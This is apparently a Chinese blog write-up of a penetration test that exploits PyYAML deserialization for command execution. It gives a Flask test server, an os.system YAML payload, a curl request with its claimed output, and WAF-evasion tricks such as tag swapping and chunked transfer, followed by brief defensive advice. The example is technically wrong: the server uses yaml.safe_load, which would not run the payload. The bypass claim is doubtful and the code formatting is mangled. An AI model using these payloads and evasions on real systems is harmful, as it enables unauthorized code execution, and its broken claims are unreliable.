一、理解目标:从漏洞成因到攻击原理

在一次内部测试中,我的任务是攻破一个互联网公司内部的某关键业务系统。这个系统使用的是某开源框架,版本稍显老旧。我习惯性地分析框架的历史漏洞列表,发现它的某一版本存在一个经典漏洞:反序列化RCE。于是,我决定以此为切入点进行攻击。

反序列化漏洞的成因,大多可以归结为开发者在处理用户输入数据时的疏忽。这些漏洞通常出现在 Java、PHP、Python 等语言的序列化机制中。简单来说,当应用程序接受未经验证的数据并调用反序列化函数时,如果用户控制了数据内容,就可能执行任意代码。

具体到这次测试的目标,我发现系统存在一个 JSON 接口,用于处理复杂数据结构。通过对流量包的分析,我发现某个字段会被反序列化,且没有进行输入过滤。这是一个典型的漏洞触发点。

---

二、搭建环境:重现漏洞的关键准备

为了验证漏洞,我先在本地搭建了与目标系统类似的测试环境。以下是我的环境搭建步骤:

环境需求

  • 操作系统:Ubuntu 22.04
  • 编程语言:Python 3.8
  • 依赖框架:Flask(模拟目标接口)、PyYAML(用于序列化/反序列化操作)

搭建步骤

  1. 安装 Flask 和 PyYAML:

    2. <pre><code class="language-bash"> sudo apt update sudo apt install python3-pip -y pip3 install flask pyyaml `

  1. 编写一个简单的 Flask 服务,模拟目标的 JSON 接口:

    2. `python from flask import Flask, request import yaml

app = Flask(__name__)

@app.route(&#039;/data&#039;, methods=[&#039;POST&#039;]) def process_data(): try:

这里直接反序列化用户提供的 YAML 数据

data = yaml.safe_load(request.data) return f&quot;Processed: {data}&quot; except Exception as e: return f&quot;Error: {str(e)}&quot;

if __name__ == &quot;__main__&quot;: app.run(host=&quot;0.0.0.0&quot;, port=5000) `

这段代码中,yaml.safe_load 是一个反序列化函数。如果输入数据被攻击者构造为恶意载荷,程序可能会执行意料之外的代码。

  1. 启动服务:

    2. `bash python3 app.py `

服务启动后,我们可以通过 POST 请求向 /data 接口发送数据,模拟目标系统的行为。

---

三、构造恶意载荷:Payload 的艺术

反序列化漏洞的核心在于构造恶意载荷,利用反序列化时的执行逻辑实现任意代码执行。这次攻击中,我决定用 PyYAML 的特性来构造 Payload。

原理探究

PyYAML 在反序列化时支持一种称为 YAML 标签 的特性。攻击者可以利用这些标签调用 Python 的内置函数,比如 os.system,从而执行任意命令。

恶意载荷设计

以下是一个可以触发 PyYAML 的命令执行漏洞的 Payload: </code></pre>yaml !!python/object/apply:os.system ["id"] <pre><code> 这个 Payload 的作用是调用 os.system(&quot;id&quot;),展示当前用户的权限。

攻击步骤

  1. 使用 curl 模拟恶意请求:

    2. `bash curl -X POST http://127.0.0.1:5000/data -d &#039;!!python/object/apply:os.system [&quot;id&quot;]&#039; `

  1. 如果服务存在漏洞,返回结果可能是类似以下内容:

    2. ` Processed: uid=1000(user) gid=1000(user) groups=1000(user) `

黑客示意图

这说明命令执行成功,我们已经完成了初步的漏洞验证。

黑客示意图

---

四、绕过与免杀:避开防御机制

实际攻击中,目标系统通常会部署基本的防御机制,比如:

  1. WAF规则:拦截特定的关键词,如 !!python/object/apply
  2. 输入过滤:通过正则表达式检测恶意数据。

绕过策略

绕过这些防御的关键在于对 Payload 进行混淆或改造。

黑客示意图

方法一:标签混淆

PyYAML 支持使用自定义标签别名,这可以绕过基于字符串匹配的防御规则。例如:</code></pre>yaml !!python/object/apply:os.system ["whoami"] <pre><code>可以改写为:</code></pre>yaml !!python/object/new:os.system ["whoami"] `

方法二:分块传输

如果 WAF 检测了整个请求体,可以尝试利用分块传输协议,将 Payload 分成若干小块发送。

---

黑客示意图

五、检测与防御:如何保护系统免受攻击

作为攻击者,我通常会分析目标的防御策略,寻找绕过点。不过在测试结束后,总会给受测方提供一些防御建议。

以下是针对 PyYAML 漏洞的几个防御措施:

  1. 限制反序列化功能:禁用不必要的 YAML 标签,确保只允许安全的数据类型。
  2. 输入验证与过滤:在反序列化之前对数据进行严格的格式检查,拒绝包含特殊标签的数据。
  3. 升级框架版本:确保使用最新的 PyYAML 库,避免使用存在漏洞的版本。

---

六、实战心得:从失败到成功的经验

在这次测试中,我遇到了一个小插曲:初期构造的 Payload 被目标的防火墙拦截了,返回了一堆 403 错误。我尝试了多种绕过手段,比如标签混淆、编码改造,最终才绕过防火墙成功执行代码。

从这次经历中,我总结了一些经验:

  1. 深入挖掘原理:了解漏洞的运行机制是解决问题的核心。
  2. 多次尝试与调整:攻击过程中的失败是常态,学会从失败中寻找线索。
  3. 环境还原的重要性:本地环境的搭建能帮助你快速验证思路,缩短调试时间。

---

至此,整个攻击链已经完整展示。从漏洞发现到利用,再到防御建议,实战经验告诉我们,只有站在攻击者的视角,才能真正理解系统的脆弱点。希望这篇文章能对你有所启发!